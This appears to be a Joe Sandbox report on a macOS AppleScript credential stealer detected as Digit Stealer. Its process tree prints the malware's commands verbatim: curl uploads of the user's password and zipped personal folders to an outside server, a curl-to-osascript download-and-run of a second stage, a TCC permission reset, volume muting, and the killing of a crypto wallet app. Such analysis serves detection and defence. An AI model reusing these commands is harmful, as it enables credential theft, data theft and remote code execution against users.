Joe Sandbox Cloud Pro Analysis Report

Loading Joe Sandbox Report ...

Edit tour

macOS Analysis Report
payload_1_stealer.scpt

Overview

General Information

Sample name:payload_1_stealer.scpt
Analysis ID:5177034
Has dependencies:false
MD5:891b1bf224a59baa80e0ed0c08a08131
SHA1:b463cfbeb11a86b0650a42667794ae888791913d
SHA256:5d8a374139573798e23de60d1ca1610f6d1abecd5d17ecf32c82f1cfd338e03f
Infos:

Detection

Digit Stealer
Score:88
Range:0 - 100

Signatures

Exfiltrates password data via HTTP using curl
Kills crypto wallet applications indicative for crypto stealers
Yara detected Digit Stealer
Clears all privacy permission grants using tccutil
Executes the "dscl" command with authonly argument (probably to verify the login password)
Mutes the volume using AppleScript likely to hide suspicious activity from the user
Terminates several processes with shell command 'killall'
Uploads files by emulating a filled-in form
Writes files containing the user's password
Creates hidden files, links and/or directories
Executes AppleScripts and/or other OSA language scripts with shell command "osascript"
Executes commands using a shell command-line interpreter
Executes cryptographic hash commands used for computing and checking message digests
Executes the "curl" command used to transfer data via the network (typically using HTTP/S)
Executes the "mkdir" command used to create folders
Executes the "nohup" (no hangup) command used to avoid background terminal process from being killed
Executes the "rm" command used to delete files or directories
Executes the "system_profiler" command used to collect detailed system hardware and software information
Executes the "tccutil" command used to manage privacy permissions controlled by TCC (Transparency, Consent, and Control)
Executes the "uuidgen" command used to generate UUIDs
Many shell processes execute programs via execve syscall (might be indicative of malicious behavior)
Uses AppleScript framework/components containing AppleScript related functionalities
Uses AppleScript scripting additions containing additional functionalities for AppleScripts
Writes ZIP files to disk

Classification

General Information

Joe Sandbox version:
Analysis ID:5177034
Start date and time:2026-01-14 15:17:02 +01:00
Joe Sandbox product:Cloud
Overall analysis duration:0h 11m 15s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultmacinteractivecookbook.jbs
Analysis system description:Mac Mini, Apple Silicon ARM64, Sequoia (Office 2021, Java 8 Update 471, Adobe Acrobat Reader 25, Chrome 142, Firefox 145, Node.js 24.11.1, NPM 11.6.2)
macOS major version:15
CPU architecture:arm64
Analysis Mode:default
Sample name:payload_1_stealer.scpt
Detection:MAL
Classification:mal88.troj.spyw.evad.macSCPT@0/28@5/0

Warnings

  • Excluded IPs from analysis (whitelisted): 17.253.3.137, 17.253.3.141, 17.253.15.132, 17.253.57.202, 17.253.15.136, 17.253.57.200, 173.222.168.250, 17.253.15.150, 17.253.37.210, 17.253.53.205, 17.253.37.201, 17.253.53.208, 17.253.15.162, 17.253.29.204, 17.253.29.210, 64.78.200.1, 17.132.88.112, 17.132.88.120, 17.253.96.119, 64.78.201.1, 17.132.88.117, 17.253.144.10, 17.253.57.195, 17.253.57.199, 23.44.201.178, 23.44.201.187, 17.171.47.23, 17.253.3.140, 17.253.3.134, 23.59.144.237, 23.59.144.201, 17.253.57.198, 17.253.57.196, 17.253.15.140, 23.50.131.77
  • Excluded domains from analysis (whitelisted): www-apple-com.v.aaplimg.com, pancake.apple.com, pancake.g.aaplimg.com, gdmf.apple.com, app-site-association.cdn-apple.com, app-site-association.cdn-apple.com.akadns.net, e5977.dsce9.akamaiedge.net, configuration-lb.ls-apple.com.akadns.net, www.apple.com, configuration-row-lb.apple.com.akadns.net, configuration.ls.apple.com, gdmf.v.aaplimg.com, doh.dns.apple.com, e3925.dscg.akamaiedge.net, a1091.dscapi7.akamai.net, app-site-association.g.aaplimg.com, stocks-data-service.lb-apple.com.akadns.net, experiments.apple.com, ab.apple.com.akadns.net, e6858.dsce9.akamaiedge.net, configuration.ls.v.aaplimg.com, experiments.apple.com.edgekey.net, doh-dns-apple-com.v.aaplimg.com, stocks-data-service-row.lb-apple.com.akadns.net, mesu-cdn.origin-apple.com.akadns.net, apple.com, apps-mzstatic-lb.itunes-apple.com.akadns.net, mesu.g.aaplimg.com, www.apple.com.edgekey.net, weatherkit.apple.com, apps-mzstatic-cdn.itunes-apple.com.akadns.net, configuration.v.aaplimg.com, stocks-data-se
  • Report size exceeded maximum capacity and may have missing behavior information.
  • Report size getting too big, too many JMT_LOOKUP calls found.
  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Runtime Messages

Runtime messages are not available for Live Interaction sessions

Process Tree

  • System is mac-arm-sequoia
  • launchd New Fork (PID: 1659, Parent: 1)
  • xpcproxy (MD5: 8fca306961007faa26bb13e891025ec9) Arguments: xpcproxy com.apple.AuthenticationServicesCore.AuthenticationServicesAgent
  • AuthenticationServicesAgent (MD5: 51b6e9f57b972003f862cbee0a018d22) Arguments: /System/Cryptexes/App/usr/libexec/AuthenticationServicesAgent
  • Terminal New Fork (PID: 1661, Parent: 437)
  • login (MD5: 03b1ed8c15ae09b42c847a7d3a903793) Arguments: login -pf jess
    • login New Fork (PID: 1662, Parent: 1661)
    • bash (MD5: 83116cbffb2ff98b687b909de76e7bc2) Arguments: -bash
      • bash New Fork (PID: 1663, Parent: 1662)
        • bash New Fork (PID: 1664, Parent: 1663)
        • path_helper (MD5: 19a4db31fd1c2f359e98b84bf8b4738c) Arguments: /usr/libexec/path_helper -s
      • bash New Fork (PID: 1665, Parent: 1662)
      • mkdir (MD5: ba85abfff38bf449dbf250cdf2870aa3) Arguments: mkdir -m 700 -p /Users/jess/.bash_sessions
      • bash New Fork (PID: 1666, Parent: 1662)
        • bash New Fork (PID: 1667, Parent: 1666)
        • touch (MD5: c293312b66ea9feb646a6ab17eb8fea6) Arguments: /usr/bin/touch /Users/jess/.bash_sessions/75A3C1DC-74DD-49F5-A23E-2D938806E22F.historynew
      • bash New Fork (PID: 1676, Parent: 1662)
      • osascript (MD5: 5f83ecd5cfb91995b8ef3b640215348f) Arguments: osascript payload_1_stealer.scpt
        • sh (MD5: 9189ebe0e9149b00400e748ae37a84ad) Arguments: sh -c system_profiler SPHardwareDataType | awk -F': ' '/Hardware UUID/ {print $2}' | md5
        • bash (MD5: 83116cbffb2ff98b687b909de76e7bc2) Arguments: sh -c system_profiler SPHardwareDataType | awk -F': ' '/Hardware UUID/ {print $2}' | md5
          • bash New Fork (PID: 1678, Parent: 1677)
          • system_profiler (MD5: 917b2aeeaa665167730054c51b2e401a) Arguments: system_profiler SPHardwareDataType
            • system_profiler (MD5: 917b2aeeaa665167730054c51b2e401a) Arguments: /usr/sbin/system_profiler -nospawn -xml SPHardwareDataType -detailLevel full
          • bash New Fork (PID: 1679, Parent: 1677)
          • awk (MD5: 23e179705448b4852c2872f3fb21e64e) Arguments: awk -F: /Hardware UUID/ {print $2}
          • bash New Fork (PID: 1680, Parent: 1677)
          • md5 (MD5: 2d57517294ccc647bc9725bb97e5550e) Arguments: md5
        • sh (MD5: 9189ebe0e9149b00400e748ae37a84ad) Arguments: sh -c uuidgen
        • bash (MD5: 83116cbffb2ff98b687b909de76e7bc2) Arguments: sh -c uuidgen
        • uuidgen (MD5: 802746000e26887a8877aea77e22a9c7) Arguments: uuidgen
        • sh (MD5: 9189ebe0e9149b00400e748ae37a84ad) Arguments: sh -c echo 'F6755809-1549-4438-86BA-7B8DDC85498B' | tr -d '\n' | md5
        • bash (MD5: 83116cbffb2ff98b687b909de76e7bc2) Arguments: sh -c echo 'F6755809-1549-4438-86BA-7B8DDC85498B' | tr -d '\n' | md5
          • bash New Fork (PID: 1685, Parent: 1684)
          • bash New Fork (PID: 1686, Parent: 1684)
          • tr (MD5: cf3665845ff99ebd92786f71887ecbfe) Arguments: tr -d \n
          • bash New Fork (PID: 1687, Parent: 1684)
          • md5 (MD5: 2d57517294ccc647bc9725bb97e5550e) Arguments: md5
        • sh (MD5: 9189ebe0e9149b00400e748ae37a84ad) Arguments: sh -c tail -n 1 /tmp/wid.txt
        • bash (MD5: 83116cbffb2ff98b687b909de76e7bc2) Arguments: sh -c tail -n 1 /tmp/wid.txt
        • tail (MD5: 63ce395284bfbe6de4a23d8e04437d0c) Arguments: tail -n 1 /tmp/wid.txt
        • sh (MD5: 9189ebe0e9149b00400e748ae37a84ad) Arguments: sh -c /usr/bin/dscl /Local/Default -authonly jess '123456'
        • bash (MD5: 83116cbffb2ff98b687b909de76e7bc2) Arguments: sh -c /usr/bin/dscl /Local/Default -authonly jess '123456'
        • dscl (MD5: e65212ab7a555d70d0b19a2badc318b0) Arguments: /usr/bin/dscl /Local/Default -authonly jess 123456
        • sh (MD5: 9189ebe0e9149b00400e748ae37a84ad) Arguments: sh -c nohup curl --retry 10 --retry-delay 10 --max-time 10 -d 'hwid=53210679051327234f0b2e6abf37d5d7&wid=unknown&user=jess&pass=123456' https://goldenticketsshop.com/api/credentials >/dev/null 2>&1 &
        • bash (MD5: 83116cbffb2ff98b687b909de76e7bc2) Arguments: sh -c nohup curl --retry 10 --retry-delay 10 --max-time 10 -d 'hwid=53210679051327234f0b2e6abf37d5d7&wid=unknown&user=jess&pass=123456' https://goldenticketsshop.com/api/credentials >/dev/null 2>&1 &
          • bash New Fork (PID: 1701, Parent: 1700)
          • nohup (MD5: 1775c434908723c7b7eedd9b05a0118a) Arguments: nohup curl --retry 10 --retry-delay 10 --max-time 10 -d hwid=53210679051327234f0b2e6abf37d5d7&wid=unknown&user=jess&pass=123456 https://goldenticketsshop.com/api/credentials
          • curl (MD5: ad602a7e6e02370d461bde3080879c0d) Arguments: curl --retry 10 --retry-delay 10 --max-time 10 -d hwid=53210679051327234f0b2e6abf37d5d7&wid=unknown&user=jess&pass=123456 https://goldenticketsshop.com/api/credentials
        • sh (MD5: 9189ebe0e9149b00400e748ae37a84ad) Arguments: sh -c echo $HOME
        • bash (MD5: 83116cbffb2ff98b687b909de76e7bc2) Arguments: sh -c echo $HOME
        • sh (MD5: 9189ebe0e9149b00400e748ae37a84ad) Arguments: sh -c echo '123456' >> '/Users/jess/.53210679051327234f0b2e6abf37d5d7.txt'
        • bash (MD5: 83116cbffb2ff98b687b909de76e7bc2) Arguments: sh -c echo '123456' >> '/Users/jess/.53210679051327234f0b2e6abf37d5d7.txt'
        • sh (MD5: 9189ebe0e9149b00400e748ae37a84ad) Arguments: sh -c tccutil reset All
        • bash (MD5: 83116cbffb2ff98b687b909de76e7bc2) Arguments: sh -c tccutil reset All
        • tccutil (MD5: bfc1833a20a58a5f31aa4731c1d8216f) Arguments: tccutil reset All
        • sh (MD5: 9189ebe0e9149b00400e748ae37a84ad) Arguments: sh -c mkdir -p /tmp/a5b9845c461d901dad1363386bac5a75/Desktop
        • bash (MD5: 83116cbffb2ff98b687b909de76e7bc2) Arguments: sh -c mkdir -p /tmp/a5b9845c461d901dad1363386bac5a75/Desktop
        • mkdir (MD5: ba85abfff38bf449dbf250cdf2870aa3) Arguments: mkdir -p /tmp/a5b9845c461d901dad1363386bac5a75/Desktop
        • sh (MD5: 9189ebe0e9149b00400e748ae37a84ad) Arguments: sh -c mkdir -p /tmp/a5b9845c461d901dad1363386bac5a75/Documents
        • bash (MD5: 83116cbffb2ff98b687b909de76e7bc2) Arguments: sh -c mkdir -p /tmp/a5b9845c461d901dad1363386bac5a75/Documents
        • mkdir (MD5: ba85abfff38bf449dbf250cdf2870aa3) Arguments: mkdir -p /tmp/a5b9845c461d901dad1363386bac5a75/Documents
        • sh (MD5: 9189ebe0e9149b00400e748ae37a84ad) Arguments: sh -c mkdir -p /tmp/a5b9845c461d901dad1363386bac5a75/Downloads
        • bash (MD5: 83116cbffb2ff98b687b909de76e7bc2) Arguments: sh -c mkdir -p /tmp/a5b9845c461d901dad1363386bac5a75/Downloads
        • mkdir (MD5: ba85abfff38bf449dbf250cdf2870aa3) Arguments: mkdir -p /tmp/a5b9845c461d901dad1363386bac5a75/Downloads
        • sh (MD5: 9189ebe0e9149b00400e748ae37a84ad) Arguments: sh -c mkdir -p /tmp/a5b9845c461d901dad1363386bac5a75/Notes
        • bash (MD5: 83116cbffb2ff98b687b909de76e7bc2) Arguments: sh -c mkdir -p /tmp/a5b9845c461d901dad1363386bac5a75/Notes
        • mkdir (MD5: ba85abfff38bf449dbf250cdf2870aa3) Arguments: mkdir -p /tmp/a5b9845c461d901dad1363386bac5a75/Notes
        • sh (MD5: 9189ebe0e9149b00400e748ae37a84ad) Arguments: sh -c cd /tmp && zip -r '/tmp/a5b9845c461d901dad1363386bac5a75.zip' a5b9845c461d901dad1363386bac5a75
        • bash (MD5: 83116cbffb2ff98b687b909de76e7bc2) Arguments: sh -c cd /tmp && zip -r '/tmp/a5b9845c461d901dad1363386bac5a75.zip' a5b9845c461d901dad1363386bac5a75
          • bash New Fork (PID: 1744, Parent: 1743)
          • zip (MD5: 2e76e4c228d7c01108eeee4f5277037c) Arguments: zip -r /tmp/a5b9845c461d901dad1363386bac5a75.zip a5b9845c461d901dad1363386bac5a75
        • sh (MD5: 9189ebe0e9149b00400e748ae37a84ad) Arguments: sh -c curl --retry 10 --retry-delay 10 --max-time 3600 -F 'file=@/tmp/a5b9845c461d901dad1363386bac5a75.zip' -F 'hwid=53210679051327234f0b2e6abf37d5d7' -F 'wid=unknown' -F 'user=jess' https://goldenticketsshop.com/api/grabber
        • bash (MD5: 83116cbffb2ff98b687b909de76e7bc2) Arguments: sh -c curl --retry 10 --retry-delay 10 --max-time 3600 -F 'file=@/tmp/a5b9845c461d901dad1363386bac5a75.zip' -F 'hwid=53210679051327234f0b2e6abf37d5d7' -F 'wid=unknown' -F 'user=jess' https://goldenticketsshop.com/api/grabber
        • curl (MD5: ad602a7e6e02370d461bde3080879c0d) Arguments: curl --retry 10 --retry-delay 10 --max-time 3600 -F file=@/tmp/a5b9845c461d901dad1363386bac5a75.zip -F hwid=53210679051327234f0b2e6abf37d5d7 -F wid=unknown -F user=jess https://goldenticketsshop.com/api/grabber
        • sh (MD5: 9189ebe0e9149b00400e748ae37a84ad) Arguments: sh -c rm -rf /tmp/a5b9845c461d901dad1363386bac5a75
        • bash (MD5: 83116cbffb2ff98b687b909de76e7bc2) Arguments: sh -c rm -rf /tmp/a5b9845c461d901dad1363386bac5a75
        • rm (MD5: 9cd9b128dbecc357fa3dcce5de63a3f2) Arguments: rm -rf /tmp/a5b9845c461d901dad1363386bac5a75
        • sh (MD5: 9189ebe0e9149b00400e748ae37a84ad) Arguments: sh -c rm -f '/tmp/a5b9845c461d901dad1363386bac5a75.zip'
        • bash (MD5: 83116cbffb2ff98b687b909de76e7bc2) Arguments: sh -c rm -f '/tmp/a5b9845c461d901dad1363386bac5a75.zip'
        • rm (MD5: 9cd9b128dbecc357fa3dcce5de63a3f2) Arguments: rm -f /tmp/a5b9845c461d901dad1363386bac5a75.zip
        • sh (MD5: 9189ebe0e9149b00400e748ae37a84ad) Arguments: sh -c nohup curl -fsSL 'https://67e5143a9ca7d2240c137ef80f2641d6.pages.dev/32f763b45cec3531f39b5365edf2c97e.aspx' | osascript >/dev/null 2>&1 &
        • bash (MD5: 83116cbffb2ff98b687b909de76e7bc2) Arguments: sh -c nohup curl -fsSL 'https://67e5143a9ca7d2240c137ef80f2641d6.pages.dev/32f763b45cec3531f39b5365edf2c97e.aspx' | osascript >/dev/null 2>&1 &
          • bash New Fork (PID: 1817, Parent: 1816)
          • nohup (MD5: 1775c434908723c7b7eedd9b05a0118a) Arguments: nohup curl -fsSL https://67e5143a9ca7d2240c137ef80f2641d6.pages.dev/32f763b45cec3531f39b5365edf2c97e.aspx
          • curl (MD5: ad602a7e6e02370d461bde3080879c0d) Arguments: curl -fsSL https://67e5143a9ca7d2240c137ef80f2641d6.pages.dev/32f763b45cec3531f39b5365edf2c97e.aspx
          • bash New Fork (PID: 1818, Parent: 1816)
          • osascript (MD5: 5f83ecd5cfb91995b8ef3b640215348f) Arguments: osascript
            • sh (MD5: 9189ebe0e9149b00400e748ae37a84ad) Arguments: sh -c osascript -e 'set volume with output muted'
            • bash (MD5: 83116cbffb2ff98b687b909de76e7bc2) Arguments: sh -c osascript -e 'set volume with output muted'
            • osascript (MD5: 5f83ecd5cfb91995b8ef3b640215348f) Arguments: osascript -e set volume with output muted
            • sh (MD5: 9189ebe0e9149b00400e748ae37a84ad) Arguments: sh -c mkdir -p '/tmp/downloaded_parts'
            • bash (MD5: 83116cbffb2ff98b687b909de76e7bc2) Arguments: sh -c mkdir -p '/tmp/downloaded_parts'
            • mkdir (MD5: ba85abfff38bf449dbf250cdf2870aa3) Arguments: mkdir -p /tmp/downloaded_parts
            • sh (MD5: 9189ebe0e9149b00400e748ae37a84ad) Arguments: sh -c rm -f '/tmp/app.asar.zip'
            • bash (MD5: 83116cbffb2ff98b687b909de76e7bc2) Arguments: sh -c rm -f '/tmp/app.asar.zip'
            • rm (MD5: 9cd9b128dbecc357fa3dcce5de63a3f2) Arguments: rm -f /tmp/app.asar.zip
            • sh (MD5: 9189ebe0e9149b00400e748ae37a84ad) Arguments: sh -c curl --max-time 3600 --retry 10 --retry-delay 5 --retry-max-time 3600 -f -C - -o '/tmp/downloaded_parts/part1.aspx' 'https://67e5143a9ca7d2240c137ef80f2641d6.pages.dev/app.asar.zip.part1.aspx'
            • bash (MD5: 83116cbffb2ff98b687b909de76e7bc2) Arguments: sh -c curl --max-time 3600 --retry 10 --retry-delay 5 --retry-max-time 3600 -f -C - -o '/tmp/downloaded_parts/part1.aspx' 'https://67e5143a9ca7d2240c137ef80f2641d6.pages.dev/app.asar.zip.part1.aspx'
            • curl (MD5: ad602a7e6e02370d461bde3080879c0d) Arguments: curl --max-time 3600 --retry 10 --retry-delay 5 --retry-max-time 3600 -f -C - -o /tmp/downloaded_parts/part1.aspx https://67e5143a9ca7d2240c137ef80f2641d6.pages.dev/app.asar.zip.part1.aspx
            • sh (MD5: 9189ebe0e9149b00400e748ae37a84ad) Arguments: sh -c cat '/tmp/downloaded_parts/part1.aspx' >> '/tmp/app.asar.zip'
            • bash (MD5: 83116cbffb2ff98b687b909de76e7bc2) Arguments: sh -c cat '/tmp/downloaded_parts/part1.aspx' >> '/tmp/app.asar.zip'
              • bash New Fork (PID: 1826, Parent: 1825)
              • cat (MD5: db480a7daa19962acfe687365ddf3667) Arguments: cat /tmp/downloaded_parts/part1.aspx
            • sh (MD5: 9189ebe0e9149b00400e748ae37a84ad) Arguments: sh -c curl --max-time 3600 --retry 10 --retry-delay 5 --retry-max-time 3600 -f -C - -o '/tmp/downloaded_parts/part2.aspx' 'https://67e5143a9ca7d2240c137ef80f2641d6.pages.dev/app.asar.zip.part2.aspx'
            • bash (MD5: 83116cbffb2ff98b687b909de76e7bc2) Arguments: sh -c curl --max-time 3600 --retry 10 --retry-delay 5 --retry-max-time 3600 -f -C - -o '/tmp/downloaded_parts/part2.aspx' 'https://67e5143a9ca7d2240c137ef80f2641d6.pages.dev/app.asar.zip.part2.aspx'
            • curl (MD5: ad602a7e6e02370d461bde3080879c0d) Arguments: curl --max-time 3600 --retry 10 --retry-delay 5 --retry-max-time 3600 -f -C - -o /tmp/downloaded_parts/part2.aspx https://67e5143a9ca7d2240c137ef80f2641d6.pages.dev/app.asar.zip.part2.aspx
            • sh (MD5: 9189ebe0e9149b00400e748ae37a84ad) Arguments: sh -c cat '/tmp/downloaded_parts/part2.aspx' >> '/tmp/app.asar.zip'
            • bash (MD5: 83116cbffb2ff98b687b909de76e7bc2) Arguments: sh -c cat '/tmp/downloaded_parts/part2.aspx' >> '/tmp/app.asar.zip'
              • bash New Fork (PID: 1832, Parent: 1831)
              • cat (MD5: db480a7daa19962acfe687365ddf3667) Arguments: cat /tmp/downloaded_parts/part2.aspx
            • sh (MD5: 9189ebe0e9149b00400e748ae37a84ad) Arguments: sh -c curl --max-time 3600 --retry 10 --retry-delay 5 --retry-max-time 3600 -f -C - -o '/tmp/downloaded_parts/part3.aspx' 'https://67e5143a9ca7d2240c137ef80f2641d6.pages.dev/app.asar.zip.part3.aspx'
            • bash (MD5: 83116cbffb2ff98b687b909de76e7bc2) Arguments: sh -c curl --max-time 3600 --retry 10 --retry-delay 5 --retry-max-time 3600 -f -C - -o '/tmp/downloaded_parts/part3.aspx' 'https://67e5143a9ca7d2240c137ef80f2641d6.pages.dev/app.asar.zip.part3.aspx'
            • curl (MD5: ad602a7e6e02370d461bde3080879c0d) Arguments: curl --max-time 3600 --retry 10 --retry-delay 5 --retry-max-time 3600 -f -C - -o /tmp/downloaded_parts/part3.aspx https://67e5143a9ca7d2240c137ef80f2641d6.pages.dev/app.asar.zip.part3.aspx
            • sh (MD5: 9189ebe0e9149b00400e748ae37a84ad) Arguments: sh -c cat '/tmp/downloaded_parts/part3.aspx' >> '/tmp/app.asar.zip'
            • bash (MD5: 83116cbffb2ff98b687b909de76e7bc2) Arguments: sh -c cat '/tmp/downloaded_parts/part3.aspx' >> '/tmp/app.asar.zip'
              • bash New Fork (PID: 1836, Parent: 1835)
              • cat (MD5: db480a7daa19962acfe687365ddf3667) Arguments: cat /tmp/downloaded_parts/part3.aspx
            • sh (MD5: 9189ebe0e9149b00400e748ae37a84ad) Arguments: sh -c cd /tmp && unzip -o '/tmp/app.asar.zip'
            • bash (MD5: 83116cbffb2ff98b687b909de76e7bc2) Arguments: sh -c cd /tmp && unzip -o '/tmp/app.asar.zip'
              • bash New Fork (PID: 1838, Parent: 1837)
              • unzip (MD5: 7d81bfe1a6d84df1bbbcc3af8e7be0dc) Arguments: unzip -o /tmp/app.asar.zip
            • sh (MD5: 9189ebe0e9149b00400e748ae37a84ad) Arguments: sh -c killall 'Ledger Live' || true
            • bash (MD5: 83116cbffb2ff98b687b909de76e7bc2) Arguments: sh -c killall 'Ledger Live' || true
              • bash New Fork (PID: 1840, Parent: 1839)
              • killall (MD5: ab923814083d0c666a3716402eac3530) Arguments: killall Ledger Live
  • launchd New Fork (PID: 1724, Parent: 1)
  • xpcproxy (MD5: 8fca306961007faa26bb13e891025ec9) Arguments: xpcproxy application.com.apple.Notes.1152921500311893562.1152921500311893567
  • Notes (MD5: 7105c07ed36ce8aa97a926c6016d8529) Arguments: /System/Applications/Notes.app/Contents/MacOS/Notes
  • launchd New Fork (PID: 1753, Parent: 1)
  • xpcproxy (MD5: 8fca306961007faa26bb13e891025ec9) Arguments: xpcproxy application.com.apple.systempreferences.1152921500311901955.1152921500311901960
  • System Settings (MD5: b0e7acffcbec74a202bf0ceaaec4d470) Arguments: /System/Applications/System Settings.app/Contents/MacOS/System Settings
  • cleanup

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
payload_1_stealer.scptJoeSecurity_DigitStealerYara detected Digit StealerJoe Security

    Suricata Signatures

    No Suricata rule has matched

    Joe Sandbox Signatures

    Click to jump to signature section

    Show All Signature Results
    Source: /bin/bash (PID: 1680)Hash command executable: /sbin/md5 -> md5Jump to behavior
    Source: /bin/bash (PID: 1687)Hash command executable: /sbin/md5 -> md5Jump to behavior
    Source: unknownTCP traffic detected without corresponding DNS query: 17.137.162.3
    Source: unknownTCP traffic detected without corresponding DNS query: 17.137.162.3
    Source: unknownTCP traffic detected without corresponding DNS query: 17.137.162.3
    Source: unknownTCP traffic detected without corresponding DNS query: 17.137.162.3
    Source: unknownTCP traffic detected without corresponding DNS query: 17.137.162.3
    Source: unknownTCP traffic detected without corresponding DNS query: 17.137.162.3
    Source: unknownTCP traffic detected without corresponding DNS query: 17.137.162.3
    Source: unknownTCP traffic detected without corresponding DNS query: 17.137.162.3
    Source: unknownTCP traffic detected without corresponding DNS query: 17.137.162.3
    Source: unknownTCP traffic detected without corresponding DNS query: 17.137.162.3
    Source: unknownTCP traffic detected without corresponding DNS query: 17.137.162.3
    Source: unknownTCP traffic detected without corresponding DNS query: 17.137.162.3
    Source: unknownTCP traffic detected without corresponding DNS query: 17.137.162.3
    Source: unknownTCP traffic detected without corresponding DNS query: 17.137.162.3
    Source: unknownTCP traffic detected without corresponding DNS query: 17.137.162.3
    Source: unknownTCP traffic detected without corresponding DNS query: 17.253.21.142
    Source: unknownTCP traffic detected without corresponding DNS query: 17.253.21.142
    Source: unknownTCP traffic detected without corresponding DNS query: 17.253.21.142
    Source: unknownTCP traffic detected without corresponding DNS query: 17.137.162.3
    Source: unknownTCP traffic detected without corresponding DNS query: 17.137.162.3
    Source: unknownTCP traffic detected without corresponding DNS query: 17.137.162.3
    Source: unknownTCP traffic detected without corresponding DNS query: 17.137.162.3
    Source: unknownTCP traffic detected without corresponding DNS query: 17.137.162.3
    Source: unknownTCP traffic detected without corresponding DNS query: 17.137.162.3
    Source: unknownTCP traffic detected without corresponding DNS query: 17.253.57.201
    Source: unknownTCP traffic detected without corresponding DNS query: 17.253.57.201
    Source: unknownTCP traffic detected without corresponding DNS query: 17.253.57.201
    Source: unknownTCP traffic detected without corresponding DNS query: 17.253.21.142
    Source: unknownTCP traffic detected without corresponding DNS query: 17.253.21.142
    Source: unknownTCP traffic detected without corresponding DNS query: 17.253.21.142
    Source: unknownTCP traffic detected without corresponding DNS query: 17.57.146.59
    Source: unknownTCP traffic detected without corresponding DNS query: 17.57.146.59
    Source: unknownTCP traffic detected without corresponding DNS query: 17.57.146.59
    Source: unknownTCP traffic detected without corresponding DNS query: 17.57.146.59
    Source: unknownTCP traffic detected without corresponding DNS query: 17.57.146.59
    Source: unknownTCP traffic detected without corresponding DNS query: 17.57.146.59
    Source: unknownTCP traffic detected without corresponding DNS query: 17.253.57.205
    Source: unknownTCP traffic detected without corresponding DNS query: 17.253.57.205
    Source: unknownTCP traffic detected without corresponding DNS query: 17.253.57.205
    Source: unknownUDP traffic detected without corresponding DNS query: 17.253.150.10
    Source: unknownUDP traffic detected without corresponding DNS query: 17.253.145.10
    Source: unknownUDP traffic detected without corresponding DNS query: 17.253.150.10
    Source: unknownUDP traffic detected without corresponding DNS query: 17.253.145.10
    Source: unknownUDP traffic detected without corresponding DNS query: 17.253.150.10
    Source: unknownUDP traffic detected without corresponding DNS query: 4.2.2.1
    Source: unknownUDP traffic detected without corresponding DNS query: 4.2.2.1
    Source: unknownUDP traffic detected without corresponding DNS query: 4.2.2.1
    Source: unknownUDP traffic detected without corresponding DNS query: 4.2.2.1
    Source: unknownUDP traffic detected without corresponding DNS query: 17.253.150.10
    Source: unknownUDP traffic detected without corresponding DNS query: 17.253.150.10
    Source: global trafficHTTP traffic detected: GET /32f763b45cec3531f39b5365edf2c97e.aspx HTTP/1.1host: 67e5143a9ca7d2240c137ef80f2641d6.pages.devuser-agent: curl/8.7.1accept: */*accept-encoding: identity
    Source: global trafficHTTP traffic detected: GET /app.asar.zip.part1.aspx HTTP/1.1host: 67e5143a9ca7d2240c137ef80f2641d6.pages.devuser-agent: curl/8.7.1accept: */*accept-encoding: identity
    Source: global trafficHTTP traffic detected: GET /app.asar.zip.part2.aspx HTTP/1.1host: 67e5143a9ca7d2240c137ef80f2641d6.pages.devuser-agent: curl/8.7.1accept: */*accept-encoding: identity
    Source: global trafficHTTP traffic detected: GET /app.asar.zip.part3.aspx HTTP/1.1host: 67e5143a9ca7d2240c137ef80f2641d6.pages.devuser-agent: curl/8.7.1accept: */*accept-encoding: identity
    Source: global trafficDNS traffic detected: DNS query: h3.media.apple.map.fastly.net
    Source: global trafficDNS traffic detected: DNS query: icloud.com
    Source: global trafficDNS traffic detected: DNS query: goldenticketsshop.com
    Source: global trafficDNS traffic detected: DNS query: 67e5143a9ca7d2240c137ef80f2641d6.pages.dev
    Source: payload_1_stealer.scptString found in binary or memory: https://67e5143a9ca7d2240c137ef80f2641d6.pages.dev/32f763b45cec3531f39b5365edf2c97e.aspx
    Source: payload_1_stealer.scptString found in binary or memory: https://goldenticketsshop.com
    Source: unknownNetwork traffic detected: HTTP traffic on port 49160 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49162 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57889
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49162
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49161
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49160
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58017
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57888
    Source: unknownNetwork traffic detected: HTTP traffic on port 57888 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 58016 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58025
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58027
    Source: unknownNetwork traffic detected: HTTP traffic on port 58020 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58026
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58021
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58020
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58022
    Source: unknownNetwork traffic detected: HTTP traffic on port 58022 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 58028 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 58026 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49159 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49161 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49159
    Source: unknownNetwork traffic detected: HTTP traffic on port 57889 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 57998 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58028
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57998
    Source: unknownNetwork traffic detected: HTTP traffic on port 58017 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58016
    Source: unknownNetwork traffic detected: HTTP traffic on port 58021 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 58025 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 58027 -> 443

    Key, Mouse, Clipboard, Microphone and Screen Capturing

    barindex
    Mutes the volume using AppleScript likely to hide suspicious activity from the user
